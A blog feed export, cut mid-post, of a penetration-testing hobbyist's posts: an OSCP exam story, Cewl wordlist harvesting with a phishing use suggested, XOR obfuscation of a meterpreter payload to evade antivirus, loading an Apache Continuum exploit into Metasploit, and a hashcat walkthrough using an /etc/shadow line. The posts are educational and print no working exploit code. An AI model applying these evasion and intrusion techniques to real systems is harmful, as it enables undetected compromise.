BOOM 3/5. I was feeling really good but I didn't want to get cocky or disheartened; I wanted to maintain a level, calm, focused attitude. So, at this point, it's about 7-8pm and I continued on the fourth and fifth machines and by 2am, I had a low privilege shell on the fourth machine. I slept from 2am to 6am and got up, took a swig of mountain dew, and brewed some coffee and got back to work. Well, little did I know, my laptop had updated and crashed and would not boot into the graphical UI. So I switched back to my desktop and spun up a new Kali virtual machine and was able to continue the exam. I had a low privilege shell on the fourth machine and I could not figure out how to escalate. I searched and searched until I finally was going through the output of a tool and saw something I had missed before. It basically said, in a very inconspicuous way, "you might want to check this out?" Well THANK YOU output. Way to not draw attention to something I'm looking for. Anyways, I was able to use this to finally escalate my privileges on the fourth box and get proof.txt. Thus, I had four out of five boxes completely compromised with one hour left in the exam. I tinkered with the last box and found a vulnerability but could not even get a low privilege shell. 4/5. Not bad at all. According to the scores I believed I had passed but ultimately Offsec had the final say. I contacted the admins and told them of my technical difficulties and they were willing to work with me but, I was able to get the screenshots and data off my laptop using recovery mode and then I wrote up the report.<br />
<br />
Well, today I got the email! "We are happy to inform you..." I had successfully completed the exam and I am officially OSCP certified. I laughed and cheered and told my family and friends that I had passed that 'super hard, 24-hour, hacker exam'. The best part about this exam was the hard work. This exam meant so much to me because of how much effort I put into this course and exam. I spent over 100 hours learning and practicing this material. I don't regret one single minute of it and I can't wait to start the Cracking The Perimeter course and get the OSCE next.Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-59225164974015414652016-09-28T21:47:00.001-04:002016-09-28T21:47:50.769-04:00A Pretty Cewl PostHello everyone,<br />
<br />
I have been MIA for quite awhile so as a welcome back post, let's talk about a CEWL tool. Cewl is a custom wordlist generator that comes standard with Kali. The idea is to use this tool to create a wordlist from a website that could be used for cracking passwords. In addition, this tool can also grab email addresses to be used as usernames. So, let's walk through this tool!<br />
<br />
Before we start, this post is for educational purposes only and I, as the author, do not condone the usage of this tool for any malicious purposes. In addition, this post does not reflect the views of any of the author's past, present, or future employers. <br />
<br />
The basic usage of Cewl looks like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3VKNYVx5ceQICU1RaBgWhhRvzifTbSFVuWQF5nX24G3MmqBIJu8y5La6SwYdq8TfjIXmbH1uyHSxesaUWVAriz6kobwJY6D_Zys18fUSXIVzAA_j7aupgQV1ls9tsNy885ZCfcU8pTNpI/s1600/cewl1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3VKNYVx5ceQICU1RaBgWhhRvzifTbSFVuWQF5nX24G3MmqBIJu8y5La6SwYdq8TfjIXmbH1uyHSxesaUWVAriz6kobwJY6D_Zys18fUSXIVzAA_j7aupgQV1ls9tsNy885ZCfcU8pTNpI/s320/cewl1.png" width="294" /></a></div>
Just from typing in www.google.com, cewl produced a list of interesting words that could be used as passwords. So what else can we do? We could rank the most commonly found words.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnv_-FN4RCFfu-g5mJxjTlFPSEFgLxXCk1Iyr25vGy0VQ93Imj-cekdc3AQpvyZclh72Fd3LIdRqdNqeFElLcJY5roa8LgH63zyILhppf9JrKprgBmmq51uVOsgA_gU8YikTLPqNsEtYur/s1600/cewl2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnv_-FN4RCFfu-g5mJxjTlFPSEFgLxXCk1Iyr25vGy0VQ93Imj-cekdc3AQpvyZclh72Fd3LIdRqdNqeFElLcJY5roa8LgH63zyILhppf9JrKprgBmmq51uVOsgA_gU8YikTLPqNsEtYur/s320/cewl2.png" width="294" /></a></div>
Let's see what cewl can really do...let's see the counts of words, let's write the results to a file, let's find any emails lying around, and let's parse any metadata for www.sans.org (Google didn't return any interesting results...lame).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Kn8Gyrlo-DN3CHwF3plUB0nIL95e6tdHSaOpkHod6U6pN6uK9biSuoZ-kt4ywPyzV6D9EqSiVGLA9ue-ZnEQbGD_VTcmv73mRKlQBlmTjSjY2FCuei6Mp9yTvcx_b8IN2gshoeCR5uvs/s1600/cewl4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Kn8Gyrlo-DN3CHwF3plUB0nIL95e6tdHSaOpkHod6U6pN6uK9biSuoZ-kt4ywPyzV6D9EqSiVGLA9ue-ZnEQbGD_VTcmv73mRKlQBlmTjSjY2FCuei6Mp9yTvcx_b8IN2gshoeCR5uvs/s320/cewl4.png" width="294" /></a></div>
As you can see I had to try a couple times to get a good example to show you guys but, from this information we can see some keywords usable for passwords (although not very good in my opinion but, there are better ones further down in the list). We also got some emails; we can use these to seed reconnaissance searches, or use as 'from' addresses for a phishing campaign. Lastly, we know someone named 'Lynn' worked with some of the documents Cewl was able to find.<br />
<br />
Reconnaissance is not a sexy part of hacking but, the more information we can gather the better campaign we will have. When gathering information make sure you are professional; some information when gathered and put together can be quite sensitive to people, companies, or other concerned parties. <br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-64886428574545208922016-07-18T21:57:00.001-04:002016-10-10T15:01:11.864-04:00Maybe it's...XOR obfuscation-elineWhile I was spending some quality time with Metasploit and contemplating how I would conduct a pen test using obfuscated tools, I thought, "What is a simple way to obfuscate tools without using the Metasploit framework, msfvenom, or shikata_ga_nai?" Python script! A simple XOR might prevent a tool from being caught in a pinch. So, I wrote up a script and published it <span style="color: lime;"><a href="https://github.com/Quantumite/xor_obfuscator" target="_blank">here</a></span> along with some of my results after testing.<br />
<br />
So, at first I wanted to make sure the script worked and I used test.txt, ran it through my python script using 'python xor_obfuscator.py -i test.txt -p john' and left the output file as the default value. Then, to double check that it worked, I ran 'python xor_obfuscator.py -i out.file -p john -o new.test.txt' and verified that it worked with md5 sum.<br />
<br />
<code></code>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjpdlTFJJfvLqCAHh1O0XZbzJ3BXLtohk_J-vZ6PHU3RsZ6Ra0W2CFnfpbwYP-RdvMHMQN4lTb1HAZLAJjwUDTAQMfa10wKR5H070MmjW0ea9q8BGS0LlrGw-sY2ZRf4h79e7p3bouA_Rp/s1600/Screenshot+from+2016-07-18+21%253A14%253A32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjpdlTFJJfvLqCAHh1O0XZbzJ3BXLtohk_J-vZ6PHU3RsZ6Ra0W2CFnfpbwYP-RdvMHMQN4lTb1HAZLAJjwUDTAQMfa10wKR5H070MmjW0ea9q8BGS0LlrGw-sY2ZRf4h79e7p3bouA_Rp/s320/Screenshot+from+2016-07-18+21%253A14%253A32.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6G2x71NLHjH9o12KtWcovi9ySIooWUN88uQNg7r8sFjZXdBi5nyg2fZX0hJbhGCG80ThNZblu2JMuRTJNTGB0pp52HJd7BLhF0B0qDeU__jN2XZEJ-BtF9BDINwD6YcanPYoxD-WXwYXu/s1600/Screenshot+from+2016-07-18+21%253A14%253A56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6G2x71NLHjH9o12KtWcovi9ySIooWUN88uQNg7r8sFjZXdBi5nyg2fZX0hJbhGCG80ThNZblu2JMuRTJNTGB0pp52HJd7BLhF0B0qDeU__jN2XZEJ-BtF9BDINwD6YcanPYoxD-WXwYXu/s320/Screenshot+from+2016-07-18+21%253A14%253A56.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMa1m1kYkRKzM7gPOOHy8YH2APhHtO0A5ogivysLGEChs_9nc51f0KsdH4oIgLu1_rOEwArRt6hsPwG5I6vwkjiHP5r5UjSsWkcnbF64mFRbLY2Ryc-HXXba0fnSpPEEsyIXCgP5nwpeI9/s1600/Screenshot+from+2016-07-18+21%253A15%253A35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMa1m1kYkRKzM7gPOOHy8YH2APhHtO0A5ogivysLGEChs_9nc51f0KsdH4oIgLu1_rOEwArRt6hsPwG5I6vwkjiHP5r5UjSsWkcnbF64mFRbLY2Ryc-HXXba0fnSpPEEsyIXCgP5nwpeI9/s320/Screenshot+from+2016-07-18+21%253A15%253A35.png" width="320" /></a></div>
As we can see, the 'test.txt' and 'new.test.txt' have the same md5sum but after obfuscating with password 'john' the md5sum changes. Now, let's try this with a meterpreter shell.<br />
<br />
We're going to use msfvenom to create a simple meterpreter executable and we'll run it through VirusTotal to determine if it can still detect the executable.<br />
<br />
Here we've created the meterpreter.exe and the hidden.exe.obf.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcnLriFw505OA-trr-U8epztnJdX-KhVa0YiNXWZJ1P-pwzHyM-G1H_Q1O67geeeOhF7CFaG9narc1F2BRW8qf9fqqZeQKxi1wWDAfPAbBrnJSUlRmpK60zOycJjqdrQZwxqKbSsKV07gu/s1600/Screenshot+from+2016-07-18+21%253A36%253A45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcnLriFw505OA-trr-U8epztnJdX-KhVa0YiNXWZJ1P-pwzHyM-G1H_Q1O67geeeOhF7CFaG9narc1F2BRW8qf9fqqZeQKxi1wWDAfPAbBrnJSUlRmpK60zOycJjqdrQZwxqKbSsKV07gu/s320/Screenshot+from+2016-07-18+21%253A36%253A45.png" width="320" /></a></div>
<br />
<br />
Interestingly enough, VirusTotal didn't do a great job detecting even the simple meterpreter payload but, some AVs did detect the meterpreter.exe file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWszlgECMKOR43DFC61AGIf4Gz1NsX6X6fZz4SypGtKZYgC98VkixZBW-skb13oM1DqE-arDa3EP2IucTEoFtrvBnHKET3mTw8UnVwaQVfLz4NDvAKYAzIP-C_tacEnvbS_oNigbk9R2ZQ/s1600/Screenshot+from+2016-07-18+21%253A41%253A52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWszlgECMKOR43DFC61AGIf4Gz1NsX6X6fZz4SypGtKZYgC98VkixZBW-skb13oM1DqE-arDa3EP2IucTEoFtrvBnHKET3mTw8UnVwaQVfLz4NDvAKYAzIP-C_tacEnvbS_oNigbk9R2ZQ/s320/Screenshot+from+2016-07-18+21%253A41%253A52.png" width="320" /></a></div>
<br />
Now, after we scan the hidden.exe.obf file...<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji-58s5hjs-r6KV_jH0-OUbtWvQsRSzyoZO-inlc8XSXQNW76CpDJ8SEF7C3pQ_Ht0oMdCqX9OUPmJfPBdMASgBDfx-CRNrhGoZ5hOLpRZdAcnRoJisCv0r_0ZFQM_nHnGVidCKcLMqiIJ/s1600/Screenshot+from+2016-07-18+21%253A42%253A41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji-58s5hjs-r6KV_jH0-OUbtWvQsRSzyoZO-inlc8XSXQNW76CpDJ8SEF7C3pQ_Ht0oMdCqX9OUPmJfPBdMASgBDfx-CRNrhGoZ5hOLpRZdAcnRoJisCv0r_0ZFQM_nHnGVidCKcLMqiIJ/s320/Screenshot+from+2016-07-18+21%253A42%253A41.png" width="320" /></a></div>
0% detection! This makes sense because the file virtually does not resemble an executable anymore nor could you execute it as such BUT, you could place this on a target and according to this it wouldn't be detected.<br />
<br />
This is not a sophisticated method for hiding executables but it could work to avoid simple antivirus, firewall, and intrusion detection systems. Do with it what you will!<br />
<br />
--EDIT-- 7/19/2016<br />
<br />
I was able to add random password creation and execution via temporary files to my python script. Check out the updates at the same link as above but, here it is again: https://github.com/Quantumite/xor_obfuscator/<br />
<br />
<br />
<code></code>Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-49789024480017659782016-06-15T21:53:00.000-04:002016-06-15T21:53:15.570-04:00It's a public metasploit module and I want it now!Good evening! Long time no chat, I've got a great technical article coming up that will be useful to anyone that uses Metasploit!<br />
<br />
We are going to walk through adding new modules to the metasploit framework. Not going to lie, I stole some of the knowledge and information from other walk-throughs on the internet so I'm going cite the main ones here and then walk through it myself.<br />
<br />
Thanks to:<br />
<ul>
<li><a href="https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Module"><cite class="_Rm">https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Module</cite></a></li>
<li><a href="http://www.kalitutorials.net/2014/06/add-new-exploits-to-metasploit-from.html"><cite class="_Rm"><cite class="_Rm">www.kalitutorials.net/2014/06/add-new-exploits-to-metasploit-from.html</cite></cite></a></li>
<li><cite class="_Rm"><cite class="_Rm"><a href="https://informationtreasure.wordpress.com/2014/07/25/add-new-exploits-to-metasploit-from-exploit-db/">https://informationtreasure.wordpress.com/2014/07/25/add-new-exploits-to-metasploit-from-exploit-db/</a> </cite></cite></li>
</ul>
Step 1: Find an exploit you'd like to add to metasploit! This is typically because you haven't updated metasploit for awhile (msfupdate, fyi), or there is a brand new exploit released on exploit-db and you GOTTA, GOTTA HAVE IT!<br />
<br />
For this post I decided to add the new Apache Continuum Arbitrary Command Execution exploit to metasploit (<a href="https://www.exploit-db.com/exploits/39945/">https://www.exploit-db.com/exploits/39945/</a>).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbg3lBK5Jd2-hfnyqL8v1lAhEJT7lITpnOIh0hgqcD2MgHfj2fsUl-SUIUCq7uFo8valxDgshRqcFdetfY5U_I3Q5fvPI-qS63NgOTrerdihGhIZXDRmIPGvttCnaRgiEmHWLge5uWAsok/s1600/Screenshot+from+2016-06-15+20%253A09%253A59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbg3lBK5Jd2-hfnyqL8v1lAhEJT7lITpnOIh0hgqcD2MgHfj2fsUl-SUIUCq7uFo8valxDgshRqcFdetfY5U_I3Q5fvPI-qS63NgOTrerdihGhIZXDRmIPGvttCnaRgiEmHWLge5uWAsok/s320/Screenshot+from+2016-06-15+20%253A09%253A59.png" width="320" /></a></div>
Step 2: Download the ruby script. Click the source button. Or the raw button. Somehow convert the text you see on the screen to a .rb file on your computer. Still recommend clicking the source button.<br />
Step 3: Copy or move that file to subfolders of your hidden msf directory in your home directory, for example, mine was ~/.msf5/ because i just updated metasploit. The other blogs above tend to reference ~/.msf4/ but the correct answer is whichever folder you currently have with metasploit installed. Make sure to include '-a' in your ls command so you can see the hidden folders. Now you're going to need to use mkdir under the ~/.msf5/ folder. I made ~/.msf5/exploits/apache/ to store the new exploit.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIohu_SDc76VY_oOzTAxHhk08LVrIROpNvmgn1psb2HAU_r4muarnfAwFCqM0xIKWIiwp4jTkZPeR_NIwWj0zXshgbJ8XOpAzA2VnCPCHY1ino817A1FMuISGTP6kdqU4GWISTg6e3pYSu/s1600/Screenshot+from+2016-06-15+20%253A08%253A36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIohu_SDc76VY_oOzTAxHhk08LVrIROpNvmgn1psb2HAU_r4muarnfAwFCqM0xIKWIiwp4jTkZPeR_NIwWj0zXshgbJ8XOpAzA2VnCPCHY1ino817A1FMuISGTP6kdqU4GWISTg6e3pYSu/s320/Screenshot+from+2016-06-15+20%253A08%253A36.png" width="320" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Note: Right below the hidden msf folder, you need to follow metasploit's naming convention (exploits, auxiliary, payloads, etc) but, afterwards you can put whichever folders you want so you can easily find the exploit while using metasploit.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Step 4: Here I actually had issues :( When I put the ruby script into the above directory, metasploit was very unhappy due to "Missing compatible Metasploit<major_version> class constant". In order to fix this, I grabbed an exploit that I knew metasploit accepted and tried to manually diff the files to find any discrepancies. Ultimately, it came down to this...</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDO5jP7bIawHjp51yREQIL3S_tLzX9yFHzCM_htdNUySQayQrR3-4Qur5m5HZcWkedLIjEt8XCpeeOLPLvUrR1Jz2zvMKWo_SLp1F3PliZM-Lg_S_UyTAIbAeRi1acxvyCVBZmi0kvrbza/s1600/Screenshot+from+2016-06-15+20%253A33%253A30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDO5jP7bIawHjp51yREQIL3S_tLzX9yFHzCM_htdNUySQayQrR3-4Qur5m5HZcWkedLIjEt8XCpeeOLPLvUrR1Jz2zvMKWo_SLp1F3PliZM-Lg_S_UyTAIbAeRi1acxvyCVBZmi0kvrbza/s320/Screenshot+from+2016-06-15+20%253A33%253A30.png" width="320" /></a></div>
I had to change MetasploitModule to Metasploit3 and I added "require 'msf/core'" (no double quotes, yes single quotes). Then metasploit finally accepted my new script as one of its own (d'awww).<br />
<br />
Step 5: Confirm the addition of the new script...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUzvI4ZjYx_DrA7Mrdvod3yl4u0rxj1V6B-2EFELI91ZTdAaFmD9PMIR_YXtVEfsNWtqG5ZsBWn4EaCZrTuKChs095Ld_UNZEDOcFSC7ap3R-VGvkD1Za0bVsfVsltwUSCF4xRAZ4Q6O3J/s1600/Screenshot+from+2016-06-15+20%253A11%253A06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUzvI4ZjYx_DrA7Mrdvod3yl4u0rxj1V6B-2EFELI91ZTdAaFmD9PMIR_YXtVEfsNWtqG5ZsBWn4EaCZrTuKChs095Ld_UNZEDOcFSC7ap3R-VGvkD1Za0bVsfVsltwUSCF4xRAZ4Q6O3J/s320/Screenshot+from+2016-06-15+20%253A11%253A06.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
Ok, we started with 1517 exploits available and after adding our new one we have...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_oi93R1hcN0Xh1Ki-qGMej5d6NXwF_Pb_SFRF4RRCVsnlFgbq51oDZGAEE0qH92neIVVpPVe7-OfrqcqPeYFpGMVaOdDUJt_Ny9iNKg7oghWNE6AyAQMHlBdPXeLnhc5HZs4wtf3JKgX4/s1600/Screenshot+from+2016-06-15+21%253A09%253A45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_oi93R1hcN0Xh1Ki-qGMej5d6NXwF_Pb_SFRF4RRCVsnlFgbq51oDZGAEE0qH92neIVVpPVe7-OfrqcqPeYFpGMVaOdDUJt_Ny9iNKg7oghWNE6AyAQMHlBdPXeLnhc5HZs4wtf3JKgX4/s320/Screenshot+from+2016-06-15+21%253A09%253A45.png" width="320" /></a></div>
1518!! WHOOOOHOOOOO!!<br />
<br />
Step 6: Confirm you can load and run the script using msfconsole (or whichever framework you prefer)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAkpkWr8v61NOkOdN9MrgS4QSYFvfhMv5E2etIqO2GnWOnTtGMLCV8MO_bqbhlkbjNyho3MJLaTdRF_9RTmCWfe-o1xFXPo7vg7IimKBsCmy1ef4MZbDvnhE5LZG9YXk5xKqvhBM95JgCH/s1600/Screenshot+from+2016-06-15+20%253A33%253A12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAkpkWr8v61NOkOdN9MrgS4QSYFvfhMv5E2etIqO2GnWOnTtGMLCV8MO_bqbhlkbjNyho3MJLaTdRF_9RTmCWfe-o1xFXPo7vg7IimKBsCmy1ef4MZbDvnhE5LZG9YXk5xKqvhBM95JgCH/s320/Screenshot+from+2016-06-15+20%253A33%253A12.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
So far so good...now beyond the scope of this blog post I setup Apache Continuum and let's see if the exploit works...*DUN DUN DUNNNNN*<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqvtSJNzU69zOXNjWP4O43JPn3ibQEX8lvSRkk8Rc3C27o8i9PsQjRpT2oWNv1NzkZDUNWqGjoNNIzbJ411Y4TbEHwpMTf1VW8H-O_yphKV4SSWuM8LYLcVZp2i_LVdR1JDNOBWoNZtOvl/s1600/Screenshot+from+2016-06-15+21%253A26%253A55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqvtSJNzU69zOXNjWP4O43JPn3ibQEX8lvSRkk8Rc3C27o8i9PsQjRpT2oWNv1NzkZDUNWqGjoNNIzbJ411Y4TbEHwpMTf1VW8H-O_yphKV4SSWuM8LYLcVZp2i_LVdR1JDNOBWoNZtOvl/s320/Screenshot+from+2016-06-15+21%253A26%253A55.png" width="320" /></a></div>
<br />
<br />
Step 7: Exploit for fun and profit! Good luck and add all the exploits!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPhV-C9PDmceNI6a6xa2ger2_B-g0lSeec8BfrQ-QwCoKFae9wvlIfMVIUTEww_jX7HZ1ik3PrpSFyG8SGAVqaorYJ4jhsiKuRhFMn0hXmxbDUDUcCzjIAO9XX4trIinVdnH6UfLa0vOEL/s1600/Screenshot+from+2016-06-15+21%253A35%253A58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPhV-C9PDmceNI6a6xa2ger2_B-g0lSeec8BfrQ-QwCoKFae9wvlIfMVIUTEww_jX7HZ1ik3PrpSFyG8SGAVqaorYJ4jhsiKuRhFMn0hXmxbDUDUcCzjIAO9XX4trIinVdnH6UfLa0vOEL/s320/Screenshot+from+2016-06-15+21%253A35%253A58.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<ul>
</ul>
Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com1tag:blogger.com,1999:blog-918525977206186619.post-72793889818112991852016-05-19T17:59:00.000-04:002016-06-15T21:54:08.150-04:00A Hacker's Digest about Criticizing, Condemning and ComplainingFor the next few professional development related posts, I am going to be giving my commentary on Dale Carnegie's book, How to Win Friends & Influence People.<br />
<br />
In my mind, this book is a must read for every human being because no matter what job you're doing or with whom you're working, you will have to deal with another human being. This book describes many different ways about how to work with, deal with, and even succeed with people (see <a href="https://en.wikipedia.org/wiki/How_to_Win_Friends_and_Influence_People" target="_blank">here</a>), and I am going to give you my digest of the first chapter and the first chapter's principle: "Don't criticize, condemn, or complain."<br />
<br />
So what does that principle mean in the real world? Essentially, it means learn to keep your mouth shut about other PEOPLE. I emphasize the world people because you can still completely disagree, reject, or criticize an idea without criticizing or condemning the person who proposed the idea. That is a skill that takes many, many years to learn and master but it's the difference between a good and great employee or a highly technical employee and the Technical Director of a company. So what does criticizing a person look like? "You're late", "You missed another meeting", "How could you say something like that?", "Who do you think you are?" and so on. Criticism of a person really comes down to making them the subject of the criticism rather than the direct or indirect object of the criticism. For example, what's the difference between, "You missed another meeting" and "Meetings in the future will benefit from your attendance." A couple things are different: one, the subject changed from 'you' to 'the meeting', two, the tone of the sentence switched from negative to positive. Instead of talking about a person's faults, why don't you recognize the improvement and positive impact that person could have on the meeting when they attend. This will make them feel welcomed and like they belong at that meeting; ultimately, people just want to belong.<br />
<br />
I am grouping criticism and condemnation into the same group because I believe that condemnation is qualitatively the same as criticism and you can use whatever scaling factor or words to make their definitions equal. However, complaining can be very different. First off, no one likes people who complain constantly about their life, their kids, their spouse, their job, their knees, etc. however, complaining can be very cathartic for those who have the aforementioned afflictions and tend to process their emotional, mental, and physical pain verbally, thus, we have complainers. I don't believe complaining will get you anywhere professionally, especially in the hacking community, because our merit and community worth is rooted our desire to learn, struggle, and conquer challenging tasks, technologies, and processes in order to more completely understand the way somethings works and exploit it's design for our own use. So, how do we combat complaining especially when "my boss sucks", "I can't get a job", or "I'm not about that corporate life, man." The answer is hack yourself. <br />
<br />
Yes, hack yourself. Find out how you work. Find out what makes you tick, get up in the morning, why you don't like certain foods, why you prefer the weather or climate that you do, why you're reading this blog, why you're living where you are, why you're with whomever you're with (friends, spouses, girlfriends/boyfriends). Fair warning: This takes work. This takes dedication and work. The results are all on you and how much you truly, truly want to know who you are. This is the only time you should run an Nmap scan with every option set so you can learn the most about the human box you're going to hack. Once you know yourself and know exactly how you work then, you can exploit buffer overflows in your psyche and take advantage of who you are rather than excusing who you are. For example, if you're a night owl, then do your best work at night when your mind is the most sharp. If you don't like the way you feel after eating take out chinese food, then stand up for yourself and suggest an alternative when your office or group of friends decides to go there. If you really feel energized by taking a bath after dinner, then plan to take a bath after dinner so you can be the optimal you that day.<br />
<br />
Once you figure out how everything affects you, you can minimize the complaining in your life and start looking for exploits in yourself and your environment to improve yourself. <br />
<br />
Work on recognizing when you criticize others, when others criticize others, and when others criticize you. Once you notice it, make a choice to not criticize or condemn others and include them in your professional life. You never know when someone might surprise you, and supporting them when they need it most will help everyone involved.Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-28056437314058562492016-05-07T20:57:00.001-04:002016-06-15T21:54:46.985-04:00Password Cracking: HashcatFor hackers and security analysts that crack passwords, make sure you learn to use hashcat too! I normally use JTR (John the Ripper aka John) but, a friend of mine pointed out that hashcat is also a very viable tool. He insists that it's better than john but, I have not tested them nor am I saying one is better than the other. They are both password cracking tools and any great hacker/security analyst should be able to use either proficiently.<br />
<br />
To get a basic understanding of how hashcat works, check out these posts*: <br />
<ul>
<li>http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-3-using-hashcat-0156543/</li>
<li>http://hashcat.net/wiki/</li>
<li>https://www.samsclass.info/123/proj10/p12-hashcat.htm</li>
</ul>
Now, for both my and my readers' benefit, I am going to walk through using this tool to crack passwords.<br />
<br />
First, I am going to create a new user so I can crack the password. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_b2Ro4QJ-lTNC3SMHNCIhl0c_5J_hh4-D3Og_jiFWHOfGC7C2T3jQ-BJAYpNx3pBnB56GbNbnu3jNBwiCdSn0uJIgfHRx9bJZGvgYNUA0OxGdWKKebC3wyEHnNqTMmR5eOLerVa1jYkwu/s1600/Screenshot+from+2016-05-07+19%253A08%253A30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_b2Ro4QJ-lTNC3SMHNCIhl0c_5J_hh4-D3Og_jiFWHOfGC7C2T3jQ-BJAYpNx3pBnB56GbNbnu3jNBwiCdSn0uJIgfHRx9bJZGvgYNUA0OxGdWKKebC3wyEHnNqTMmR5eOLerVa1jYkwu/s320/Screenshot+from+2016-05-07+19%253A08%253A30.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
Now, I am going to follow the instructions of the previous articles to crack this password (it's fairly simple to start ;) )<br />
<br />
I put my hashcat1 user line from /etc/shadow into the hash.lst file. I checked the hash function and it is SHA512. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
